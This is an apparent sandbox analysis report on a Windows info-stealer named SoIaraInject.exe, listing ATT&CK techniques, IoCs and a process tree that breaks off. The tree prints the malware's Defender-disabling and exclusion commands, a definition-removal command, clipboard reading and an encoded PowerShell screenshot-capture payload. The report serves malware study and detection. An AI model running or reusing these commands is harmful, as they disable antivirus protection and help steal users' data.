90f97efbd57639792989bb9b00801f48f2ae0ce3c7a79f41b58c4998e439ac47

max time kernel
147s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
02/08/2024, 17:47

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

SoIaraInject.exe
Size

7.3MB
MD5

d726784827b2fdff247cada39b35a0df
SHA1

ed45d4edfd8c7a54e5da168090c32cbdee6bc75c
SHA256

90f97efbd57639792989bb9b00801f48f2ae0ce3c7a79f41b58c4998e439ac47
SHA512

af958f62cbfde14dcd6363b23e3f1ed771f37f31427a7969da25d601117c918d86113fcc989d03eb6eceeee6b8d8f089997e5c1b9733de6c4ec7b67040071ac6
SSDEEP

98304:wxo7x9XQsaIurErvz81LpWjjOI50ZtPvYRt2e4GFNGjqdiHbIbApJoUE5KhOC11x:Eo9VnurErvI9pWjy9PvzmTE0s9Ew4A7

Score

9^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3160	powershell.exe
3168	powershell.exe
2504	powershell.exe
988	powershell.exe
4156	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1068	cmd.exe
4812	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2392	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe
2596	SoIaraInject.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 63 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/536-5-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp	upx
behavioral1/memory/2596-23-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp	upx
behavioral1/files/0x000100000002aa93-22.dat	upx
behavioral1/memory/2596-27-0x00007FFB2E7E0000-0x00007FFB2EDD2000-memory.dmp	upx
behavioral1/files/0x000100000002aa86-29.dat	upx
behavioral1/files/0x000100000002aa91-32.dat	upx
behavioral1/files/0x000100000002aa8d-48.dat	upx
behavioral1/memory/2596-50-0x00007FFB493F0000-0x00007FFB493FF000-memory.dmp	upx
behavioral1/memory/2596-49-0x00007FFB444A0000-0x00007FFB444C4000-memory.dmp	upx
behavioral1/files/0x000100000002aa8c-47.dat	upx
behavioral1/files/0x000100000002aa8b-46.dat	upx
behavioral1/files/0x000100000002aa8a-45.dat	upx
behavioral1/files/0x000100000002aa89-44.dat	upx
behavioral1/files/0x000100000002aa88-43.dat	upx
behavioral1/files/0x000100000002aa87-42.dat	upx
behavioral1/files/0x000200000002aa85-41.dat	upx
behavioral1/files/0x000100000002aa98-40.dat	upx
behavioral1/files/0x000100000002aa97-39.dat	upx
behavioral1/files/0x000100000002aa96-38.dat	upx
behavioral1/files/0x000100000002aa92-35.dat	upx
behavioral1/files/0x000100000002aa90-34.dat	upx
behavioral1/memory/2596-56-0x00007FFB444D0000-0x00007FFB444FD000-memory.dmp	upx
behavioral1/memory/2596-59-0x00007FFB48C50000-0x00007FFB48C69000-memory.dmp	upx
behavioral1/memory/2596-60-0x00007FFB44470000-0x00007FFB44493000-memory.dmp	upx
behavioral1/memory/2596-62-0x00007FFB403C0000-0x00007FFB4053E000-memory.dmp	upx
behavioral1/memory/2596-64-0x00007FFB46400000-0x00007FFB46419000-memory.dmp	upx
behavioral1/memory/2596-66-0x00007FFB494A0000-0x00007FFB494AD000-memory.dmp	upx
behavioral1/memory/2596-68-0x00007FFB432A0000-0x00007FFB432D3000-memory.dmp	upx
behavioral1/memory/2596-73-0x00007FFB40760000-0x00007FFB4082D000-memory.dmp	upx
behavioral1/memory/536-72-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp	upx
behavioral1/memory/2596-75-0x00007FFB3FB20000-0x00007FFB40049000-memory.dmp	upx
behavioral1/memory/2596-76-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp	upx
behavioral1/memory/2596-87-0x00007FFB444A0000-0x00007FFB444C4000-memory.dmp	upx
behavioral1/memory/2596-86-0x00007FFB493B0000-0x00007FFB493BD000-memory.dmp	upx
behavioral1/memory/2596-85-0x00007FFB402A0000-0x00007FFB403BC000-memory.dmp	upx
behavioral1/memory/2596-84-0x00007FFB45750000-0x00007FFB45764000-memory.dmp	upx
behavioral1/memory/2596-83-0x00007FFB2E7E0000-0x00007FFB2EDD2000-memory.dmp	upx
behavioral1/memory/2596-330-0x00007FFB44470000-0x00007FFB44493000-memory.dmp	upx
behavioral1/memory/2596-350-0x00007FFB403C0000-0x00007FFB4053E000-memory.dmp	upx
behavioral1/memory/2596-367-0x00007FFB402A0000-0x00007FFB403BC000-memory.dmp	upx
behavioral1/memory/2596-364-0x00007FFB3FB20000-0x00007FFB40049000-memory.dmp	upx
behavioral1/memory/2596-368-0x00007FFB46400000-0x00007FFB46419000-memory.dmp	upx
behavioral1/memory/2596-363-0x00007FFB40760000-0x00007FFB4082D000-memory.dmp	upx
behavioral1/memory/2596-353-0x00007FFB2E7E0000-0x00007FFB2EDD2000-memory.dmp	upx
behavioral1/memory/2596-362-0x00007FFB432A0000-0x00007FFB432D3000-memory.dmp	upx
behavioral1/memory/2596-354-0x00007FFB444A0000-0x00007FFB444C4000-memory.dmp	upx
behavioral1/memory/2596-371-0x00007FFB2E7E0000-0x00007FFB2EDD2000-memory.dmp	upx
behavioral1/memory/2596-370-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp	upx
behavioral1/memory/2596-397-0x00007FFB40760000-0x00007FFB4082D000-memory.dmp	upx
behavioral1/memory/2596-399-0x00007FFB402A0000-0x00007FFB403BC000-memory.dmp	upx
behavioral1/memory/536-401-0x00007FF6DEE80000-0x00007FF6DEECF000-memory.dmp	upx
behavioral1/memory/2596-398-0x00007FFB45750000-0x00007FFB45764000-memory.dmp	upx
behavioral1/memory/2596-396-0x00007FFB432A0000-0x00007FFB432D3000-memory.dmp	upx
behavioral1/memory/2596-395-0x00007FFB494A0000-0x00007FFB494AD000-memory.dmp	upx
behavioral1/memory/2596-394-0x00007FFB46400000-0x00007FFB46419000-memory.dmp	upx
behavioral1/memory/2596-393-0x00007FFB403C0000-0x00007FFB4053E000-memory.dmp	upx
behavioral1/memory/2596-392-0x00007FFB44470000-0x00007FFB44493000-memory.dmp	upx
behavioral1/memory/2596-391-0x00007FFB48C50000-0x00007FFB48C69000-memory.dmp	upx
behavioral1/memory/2596-390-0x00007FFB444D0000-0x00007FFB444FD000-memory.dmp	upx
behavioral1/memory/2596-389-0x00007FFB493F0000-0x00007FFB493FF000-memory.dmp	upx
behavioral1/memory/2596-388-0x00007FFB444A0000-0x00007FFB444C4000-memory.dmp	upx
behavioral1/memory/2596-387-0x00007FFB493B0000-0x00007FFB493BD000-memory.dmp	upx
behavioral1/memory/2596-386-0x00007FFB3FB20000-0x00007FFB40049000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1516	tasklist.exe
2168	tasklist.exe
1084	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5076	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2092	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
988	powershell.exe
3160	powershell.exe
4156	powershell.exe
3160	powershell.exe
988	powershell.exe
4156	powershell.exe
4812	powershell.exe
4812	powershell.exe
3424	powershell.exe
3424	powershell.exe
4812	powershell.exe
3424	powershell.exe
3168	powershell.exe
3168	powershell.exe
1564	powershell.exe
1564	powershell.exe
2504	powershell.exe
2504	powershell.exe
2420	powershell.exe
2420	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeDebugPrivilege	1516	tasklist.exe
Token: SeDebugPrivilege	2168	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3168	WMIC.exe
Token: SeSecurityPrivilege	3168	WMIC.exe
Token: SeTakeOwnershipPrivilege	3168	WMIC.exe
Token: SeLoadDriverPrivilege	3168	WMIC.exe
Token: SeSystemProfilePrivilege	3168	WMIC.exe
Token: SeSystemtimePrivilege	3168	WMIC.exe
Token: SeProfSingleProcessPrivilege	3168	WMIC.exe
Token: SeIncBasePriorityPrivilege	3168	WMIC.exe
Token: SeCreatePagefilePrivilege	3168	WMIC.exe
Token: SeBackupPrivilege	3168	WMIC.exe
Token: SeRestorePrivilege	3168	WMIC.exe
Token: SeShutdownPrivilege	3168	WMIC.exe
Token: SeDebugPrivilege	3168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3168	WMIC.exe
Token: SeRemoteShutdownPrivilege	3168	WMIC.exe
Token: SeUndockPrivilege	3168	WMIC.exe
Token: SeManageVolumePrivilege	3168	WMIC.exe
Token: 33	3168	WMIC.exe
Token: 34	3168	WMIC.exe
Token: 35	3168	WMIC.exe
Token: 36	3168	WMIC.exe
Token: SeDebugPrivilege	1084	tasklist.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeIncreaseQuotaPrivilege	3168	WMIC.exe
Token: SeSecurityPrivilege	3168	WMIC.exe
Token: SeTakeOwnershipPrivilege	3168	WMIC.exe
Token: SeLoadDriverPrivilege	3168	WMIC.exe
Token: SeSystemProfilePrivilege	3168	WMIC.exe
Token: SeSystemtimePrivilege	3168	WMIC.exe
Token: SeProfSingleProcessPrivilege	3168	WMIC.exe
Token: SeIncBasePriorityPrivilege	3168	WMIC.exe
Token: SeCreatePagefilePrivilege	3168	WMIC.exe
Token: SeBackupPrivilege	3168	WMIC.exe
Token: SeRestorePrivilege	3168	WMIC.exe
Token: SeShutdownPrivilege	3168	WMIC.exe
Token: SeDebugPrivilege	3168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3168	WMIC.exe
Token: SeRemoteShutdownPrivilege	3168	WMIC.exe
Token: SeUndockPrivilege	3168	WMIC.exe
Token: SeManageVolumePrivilege	3168	WMIC.exe
Token: 33	3168	WMIC.exe
Token: 34	3168	WMIC.exe
Token: 35	3168	WMIC.exe
Token: 36	3168	WMIC.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 536 wrote to memory of 2596	536	SoIaraInject.exe	81
PID 536 wrote to memory of 2596	536	SoIaraInject.exe	81
PID 2596 wrote to memory of 4940	2596	SoIaraInject.exe	82
PID 2596 wrote to memory of 4940	2596	SoIaraInject.exe	82
PID 2596 wrote to memory of 1884	2596	SoIaraInject.exe	83
PID 2596 wrote to memory of 1884	2596	SoIaraInject.exe	83
PID 2596 wrote to memory of 3480	2596	SoIaraInject.exe	84
PID 2596 wrote to memory of 3480	2596	SoIaraInject.exe	84
PID 4940 wrote to memory of 988	4940	cmd.exe	88
PID 4940 wrote to memory of 988	4940	cmd.exe	88
PID 1884 wrote to memory of 3160	1884	cmd.exe	89
PID 1884 wrote to memory of 3160	1884	cmd.exe	89
PID 3480 wrote to memory of 4156	3480	cmd.exe	90
PID 3480 wrote to memory of 4156	3480	cmd.exe	90
PID 2596 wrote to memory of 5084	2596	SoIaraInject.exe	91
PID 2596 wrote to memory of 5084	2596	SoIaraInject.exe	91
PID 2596 wrote to memory of 2128	2596	SoIaraInject.exe	92
PID 2596 wrote to memory of 2128	2596	SoIaraInject.exe	92
PID 5084 wrote to memory of 1516	5084	cmd.exe	95
PID 5084 wrote to memory of 1516	5084	cmd.exe	95
PID 2128 wrote to memory of 2168	2128	cmd.exe	96
PID 2128 wrote to memory of 2168	2128	cmd.exe	96
PID 2596 wrote to memory of 4340	2596	SoIaraInject.exe	97
PID 2596 wrote to memory of 4340	2596	SoIaraInject.exe	97
PID 2596 wrote to memory of 1068	2596	SoIaraInject.exe	98
PID 2596 wrote to memory of 1068	2596	SoIaraInject.exe	98
PID 2596 wrote to memory of 4572	2596	SoIaraInject.exe	101
PID 2596 wrote to memory of 4572	2596	SoIaraInject.exe	101
PID 2596 wrote to memory of 2728	2596	SoIaraInject.exe	102
PID 2596 wrote to memory of 2728	2596	SoIaraInject.exe	102
PID 2596 wrote to memory of 1344	2596	SoIaraInject.exe	105
PID 2596 wrote to memory of 1344	2596	SoIaraInject.exe	105
PID 2596 wrote to memory of 1440	2596	SoIaraInject.exe	107
PID 2596 wrote to memory of 1440	2596	SoIaraInject.exe	107
PID 1068 wrote to memory of 4812	1068	cmd.exe	110
PID 1068 wrote to memory of 4812	1068	cmd.exe	110
PID 2728 wrote to memory of 5028	2728	cmd.exe	111
PID 2728 wrote to memory of 5028	2728	cmd.exe	111
PID 4340 wrote to memory of 3168	4340	cmd.exe	135
PID 4340 wrote to memory of 3168	4340	cmd.exe	135
PID 1440 wrote to memory of 3424	1440	cmd.exe	113
PID 1440 wrote to memory of 3424	1440	cmd.exe	113
PID 4572 wrote to memory of 1084	4572	cmd.exe	114
PID 4572 wrote to memory of 1084	4572	cmd.exe	114
PID 1344 wrote to memory of 2092	1344	cmd.exe	115
PID 1344 wrote to memory of 2092	1344	cmd.exe	115
PID 2596 wrote to memory of 2748	2596	SoIaraInject.exe	116
PID 2596 wrote to memory of 2748	2596	SoIaraInject.exe	116
PID 2748 wrote to memory of 2480	2748	cmd.exe	118
PID 2748 wrote to memory of 2480	2748	cmd.exe	118
PID 2596 wrote to memory of 980	2596	SoIaraInject.exe	119
PID 2596 wrote to memory of 980	2596	SoIaraInject.exe	119
PID 980 wrote to memory of 4480	980	cmd.exe	121
PID 980 wrote to memory of 4480	980	cmd.exe	121
PID 2596 wrote to memory of 4732	2596	SoIaraInject.exe	122
PID 2596 wrote to memory of 4732	2596	SoIaraInject.exe	122
PID 4732 wrote to memory of 5040	4732	cmd.exe	124
PID 4732 wrote to memory of 5040	4732	cmd.exe	124
PID 2596 wrote to memory of 688	2596	SoIaraInject.exe	125
PID 2596 wrote to memory of 688	2596	SoIaraInject.exe	125
PID 688 wrote to memory of 3892	688	cmd.exe	127
PID 688 wrote to memory of 3892	688	cmd.exe	127
PID 2596 wrote to memory of 1116	2596	SoIaraInject.exe	128
PID 2596 wrote to memory of 1116	2596	SoIaraInject.exe	128

C:\Users\Admin\AppData\Local\Temp\SoIaraInject.exe
"C:\Users\Admin\AppData\Local\Temp\SoIaraInject.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:536
- C:\Users\Admin\AppData\Local\Temp\SoIaraInject.exe
  "C:\Users\Admin\AppData\Local\Temp\SoIaraInject.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SoIaraInject.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SoIaraInject.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5084
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1344
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
